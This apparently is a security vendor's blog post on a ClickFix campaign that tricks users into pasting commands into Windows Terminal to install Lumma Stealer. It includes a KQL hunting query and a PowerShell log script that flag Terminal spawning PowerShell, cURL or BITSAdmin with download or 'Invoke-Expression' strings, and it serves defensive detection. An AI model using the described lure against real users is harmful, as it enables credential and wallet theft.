Social engineering remains the most effective initial access vector for cybercriminals, and the latest ClickFix campaign discovered by Microsoft proves that attackers are constantly refining their tactics. In February 2026, security researchers observed a sophisticated operation abusing the Windows Terminal application to deliver the notorious Lumma Stealer.
Unlike traditional "fix-it" scams that instruct victims to open the Windows Run dialog (Win+R), this new campaign guides users to launch the modern Windows Terminal. This subtle shift allows threat actors to bypass legacy heuristics focused on cmd.exe or powershell.exe spawning from standard explorers or the run dialog, making the attack chain harder to detect.
The Evolution of ClickFix
The ClickFix technique relies on psychological manipulation. Victims are lured to fraudulent web pages—often masquerading as software downloads or technical support sites—that display fake error messages. To "resolve" the issue, the user is instructed to copy and paste a provided command into their terminal.
By targeting the Windows Terminal (wt.exe), attackers exploit a tool that developers and power users trust. The command typically initiates a PowerShell script that establishes a connection to a remote server, downloading the Lumma Stealer payload. Because the command is executed by the user, it bypasses standard file-based malware detection, as the terminal itself is a trusted system utility.
The Payload: Lumma Stealer
Once the command is executed, the system is infected with Lumma Stealer. This information-stealing malware is a commodity sold on dark web forums, designed to harvest sensitive data from compromised machines. Its primary targets include:
- Cryptocurrency wallet keys and extensions
- Browser cookies and saved passwords
- Two-factor authentication (2FA) session tokens
- System information and hardware fingerprints
Technical Analysis of the Attack Chain
The attack begins with a user interaction event. Instead of the classic workflow targeting explorer.exe spawning cmd.exe, the TTP (Tactics, Techniques, and Procedures) involves explorer.exe spawning WindowsTerminal.exe, which in turn spawns a child process like powershell.exe or curl.exe to fetch the payload.
This chain is statistically rare in administrative environments. Most legitimate use of Windows Terminal involves manual command-line administration, not automated script downloading. This anomaly provides a high-fidelity signal for detection.
Detection and Threat Hunting
Security teams can hunt for this behavior by monitoring process creation events where WindowsTerminal.exe acts as a parent process to network-facing utilities like PowerShell, cURL, or BITSAdmin.
The following KQL query for Microsoft Sentinel/Defender can help identify this activity:
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName == "WindowsTerminal.exe"
| where FileName in~ ("powershell.exe", "cmd.exe", "curl.exe", "powershell_ise.exe", "bitsadmin.exe")
| where ProcessCommandLine has "http" or ProcessCommandLine has "iex" or ProcessCommandLine has "Invoke-Expression"
| project Timestamp, DeviceName, AccountName, InitiatingProcessCommandLine, ProcessCommandLine, FileName, FolderPath
| order by Timestamp desc
For administrators conducting local forensics, the following PowerShell script will query the Security Event Log for process creation events (Event ID 4688) initiated by Windows Terminal:
$TargetDate = (Get-Date).AddDays(-1)
$Events = Get-WinEvent -FilterHashtable @{
LogName='Security'
Id=4688
StartTime=$TargetDate
} -ErrorAction SilentlyContinue
$SuspiciousActivity = $Events | Where-Object {
$_.Properties[5].Value -match "WindowsTerminal.exe" # Parent Process Name
}
if ($SuspiciousActivity) {
Write-Host "ALERT: Suspicious Windows Terminal spawns detected." -ForegroundColor Red
$SuspiciousActivity | ForEach-Object {
Write-Host "Time: $($_.TimeCreated)"
Write-Host "Parent: $($_.Properties[5].Value)"
Write-Host "Command: $($_.Properties[8].Value)"
Write-Host "--------------------------------"
}
} else {
Write-Host "No suspicious activity found in the last 24 hours." -ForegroundColor Green
}
Mitigation Strategies
To defend against this evolving threat, organizations should implement a defense-in-depth approach:
- Application Control: Utilize AppLocker or Windows Defender Application Control (WDAC) to restrict which applications can be launched by Windows Terminal. For most end-users, the terminal should not be launching PowerShell scripts or downloading files via cURL.
- Attack Surface Reduction (ASR) Rules: Enable the ASR rule "Block all Office applications from creating child processes" and "Block Adobe Reader from creating child processes" to prevent similar vectors, and evaluate rules restricting PowerShell execution.
- User Awareness: Update security awareness training to include the "Terminal Fix" scam. Users should be skeptical of any website instructing them to open Windows Terminal and paste code.
- Restrict Windows Terminal Access: If your organization does not utilize Windows Terminal for daily operations, consider removing it or restricting its execution via Group Policy to developer and engineering groups only.
Related Resources
Security Arsenal Managed SOC Services AlertMonitor Platform Book a SOC Assessment soc-mdr Intel Hub
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.